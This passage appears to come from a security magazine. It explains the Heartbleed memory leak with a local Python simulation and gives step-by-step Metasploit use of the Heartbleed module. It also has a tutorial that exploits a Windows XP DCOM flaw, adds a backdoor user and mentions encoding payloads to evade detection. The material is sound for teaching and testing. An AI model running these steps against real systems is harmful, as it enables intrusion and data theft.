So the client can freely input a size value up to 65535 (64 kilobytes) regardless of the true size of the
payload. If an attacker sends a Heartbeat request saying the size is 65535, but a payload thats only 1 byte
long, the vulnerable server will store only 1 single byte in memory.
However, the response will start with that single stored byte, but continue reading data from the next 64KB
of server runtime memory, sending data read back to the client.
This data could contain usernames and passwords, private keys, garbage memory, even the certificate that
the webserver uses to state its identity.
The attack can be repeated continuously, extracting different parts of the webserver's runtime memory at each
iteration, and can be performed anonymously in an undetectable manner, as the attack can be issued early in
the negotiation process, before any webpage is served.
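A small Python model of the request handling just described, added here as an illustration and not code from the original article or from OpenSSL: a bytearray stands in for the server's process memory, vulnerable_response trusts the client's payload_length as the pre-1.0.1g code did, and fixed_response applies the record-length check that the 1.0.1g fix added. All names and the secret string are constructed for this example.

```python
import os
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16     # the extension requires at least 16 bytes of random padding
HEADER = 1 + 2   # one type byte plus the two-byte payload_length field


def build_heartbeat(claimed_length, payload):
    """Client side: type, payload_length, payload, padding.

    claimed_length is what the header says; it need not match len(payload),
    and that mismatch is exactly what Heartbleed abuses."""
    return struct.pack("!BH", HB_REQUEST, claimed_length) + payload + os.urandom(PADDING)


def response_payload(response):
    """Extract the echoed payload from a Heartbeat response (None if discarded)."""
    if response is None:
        return None
    _, length = struct.unpack_from("!BH", response, 0)
    return response[HEADER:HEADER + length]


class SimulatedServer:
    """Constructed stand-in for server memory: incoming records are copied to
    offset 0 and a secret (e.g. key material) sits a little further along."""

    def __init__(self, secret):
        self.memory = bytearray(1024)
        self.secret_offset = 64
        self.memory[self.secret_offset:self.secret_offset + len(secret)] = secret

    def _receive(self, record):
        # Store the record as received and read back the claimed payload length.
        self.memory[0:len(record)] = record
        claimed = struct.unpack_from("!BH", self.memory, 0)[1]
        return claimed, len(record)

    def vulnerable_response(self, record):
        """Pre-1.0.1g behaviour: copy payload_length bytes from memory,
        continuing past the end of what the client actually sent."""
        length, _ = self._receive(record)
        echoed = bytes(self.memory[HEADER:HEADER + length])
        return struct.pack("!BH", HB_RESPONSE, length) + echoed + os.urandom(PADDING)

    def fixed_response(self, record):
        """1.0.1g check: header + payload_length + padding must fit inside the
        received record, otherwise the message is silently discarded."""
        length, record_len = self._receive(record)
        if HEADER + length + PADDING > record_len:
            return None
        echoed = bytes(self.memory[HEADER:HEADER + length])
        return struct.pack("!BH", HB_RESPONSE, length) + echoed + os.urandom(PADDING)


if __name__ == "__main__":
    srv = SimulatedServer(b"constructed-private-key")
    honest = build_heartbeat(5, b"Hello")          # size 5, payload "Hello"
    print(response_payload(srv.vulnerable_response(honest)))   # b'Hello'
    crafted = build_heartbeat(200, b"x")            # claims 200, sends 1 byte
    leaked = response_payload(srv.vulnerable_response(crafted))
    print(b"constructed-private-key" in leaked)     # True: adjacent memory leaked
    print(srv.fixed_response(crafted))              # None: request discarded
```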
Impact and attacking surface of HeartBleed bug
Netcraft has estimated that (
websites-vulnerable-to-heartbleed-bug.html) half a million widely trusted websites were found vulnerable to
Heartbleed bug; among them, there were Facebook, Yahoo, Dropbox, Instagram.
According to the NationalJournal (
and-didn-t-tell-the-government-20140414) Google knew about the bug, but it didnt alert anyone in the
Neel Mehta, a Google engineer, first discovered Heartbleed in March 2014, while the Finnish security firm
Codenomicon discovered the flaw around the same time.
So Google was able to patch most of its services such as email, search, and YouTube before the bug was
publicly disclosed on April 7th.
The Heartbleed bug in practice
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the
vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service
providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows
attackers to eavesdrop communications, steal data directly from the services and users and to impersonate
services and users.
Basically, an attacker can grab 64K of memory from a server. The attack leaves no trace, and can be done
multiple times to grab a different random 64K of memory. This means that anything in memory, from SSL
private keys, to user keys, is vulnerable.
Figure 1 depicts the normal usage of the Heartbeat protocol and a malicious request:
Figure 1. Credits to FenixFeather (Inkscape) [CC-BY-SA-3.0 (
sa/3.0)], via Wikimedia Commons
Metasploit OpenSSL Heartbeat Information Leak
The Metasploit Openssl Heartbleed module (available at:
supports several actions, allowing for scanning, dumping of memory contents, and private key recovery; we
can use the Metasploit OpenSSL-Heartbleed module to exploit the bug, or to detect vulnerable systems, too.
Before launching the module, update Metasploit to get the latest modules. Just type msfupdate at a
command prompt, as in Figure 2:
Figure 2. msfupdate
Now run msfconsole to start the Metasploit console, then search for the heartbleed module by typing search
heartbleed, as in Figure 3:
Figure 3. Search heartbleed
At the command prompt, now type use auxiliary/scanner/ssl/openssl_heartbleed (Figure 4) to actually load
the module, and then type show options to get a list of the available module options:
Figure 4. Use auxiliary/scanner/ssl/openssl_heartbleed
We only need to set a few options: set RHOSTS to set the target IP address, then set RPORT to set
the server listening port, optionally set VERBOSE to true, and finally type run to launch the exploit, as
in Figure 5, where you can see the output of a successful exploitation conducted against a vulnerable server:
Testing for Heartbleed vulnerability without exploiting the server
A modified version of the Metasploit module has been released by David Chan, Mozilla Security Engineer
(available at:
exploiting-the-server/); the modified Metasploit module neither accesses sensitive data nor impacts service
performance, and it is aimed at helping organizations conduct safe testing for Heartbleed vulnerabilities.
While there is a higher chance of a false positive, this test should be safe to use against critical services.
Figure 5. Source:
About the Author
Dr. Alessandro Parisi, Ethical Hacker, Big Data Scientist, Business Strategist
An IT Professional for over 15 years, specialising in Ethical Hacking, Big Data Analytics and Business
Master's Degree in Statistics and Econometrics, I also qualify as a Business Strategist, covering the overall
implications of Innovation and Knowledge Management process in complex organizations.
Blog: | WebSite:
Exploit a Vulnerability with Metasploit
by Azza NAFTI
Companies invest in security programs to protect their infrastructures, in order to identify
vulnerabilities in their systems and thus avoid serious data breaches.
A penetration test is one of the most effective ways to identify weaknesses and gaps in these programs. This
test attempts to bypass security mechanisms; in other words, the penetration tester identifies ways in
which an attacker might be able to compromise the organization and damage it as a whole.
Why Metasploit?
Metasploit is an open source tool for the development and execution of exploits (malicious software) against
a remote machine; it allows you to carry out security audits and to test and develop your own exploits. Originally
created in the Perl programming language, the Metasploit Framework has been completely rewritten in the Ruby
language. It is often used by system administrators to test the vulnerability of computer systems in order to protect
them, or by hackers for malicious ends.
First, define some terms:
An exploit is the means by which a hacker or penetration tester takes advantage of a vulnerability in a
system, application or service. An attacker uses an exploit to attack a system, and the result of this attack
is the execution of the exploit's code as its developer had planned.
A payload is the code that will be executed after being introduced into the target machine.
The payloads are delivered by the Framework. For example, a reverse shell is a payload that creates a
connection from the target machine back to the attacker, giving the attacker a DOS command prompt, while a
bind shell is a payload that binds a command prompt to a listening port on the target machine, where it stays
listening, patiently waiting for the hacker to connect to it.
The steps to exploit a system
The basic steps to exploit a system are:
Choose and configure an exploit
Check whether the target system is vulnerable to the selected exploit.
Choose and configure a payload
Select the encoding technique used to encode the payload so that security systems do not detect it.
Run the exploit.
From theory to practice: Attack on Windows XP
The target is a Windows XP machine. We will use dcom, an exploit based on an RPC flaw. We compile it: gcc
Having specified no output name, GCC compiled the file as a.out. The first parameter is the target
system. The second is the IP of the victim.
So we retrieve the IP of our client (cmd => ipconfig) and, like this, the exploit worked: we have access to
the target shell and are placed on the victim's desktop.
With Metasploit, in the exploit we have just used we could replace the payload (the Windows shell) with the
one desired. Start msfconsole. After a few seconds you will see the msf> console. Do a search for the
dcom exploit used previously with the search command. When the results appear, load the exploit found
with use.
Running show options shows us what is still missing, for example RHOST, which is the target.
Then we choose our payload: set PAYLOAD windows/adduser
Running show options again, we now see the payload parameters (user / pass = metasploit). This means that
the payload will add a user named metasploit.
Run the exploit with the exploit command. The user has been created!
We saw how easy it was to exploit a vulnerability with metasploit.
It only remains to wish you good luck in its use.
About the Author
Graduated in Computer Science and Quality. She has worked at Cassiopae MEA as a
Technical Consultant since 2010. Contact:
nipper studio
Titania's award winning Nipper Studio configuration
auditing tool is helping security consultants and end-
user organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a
thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at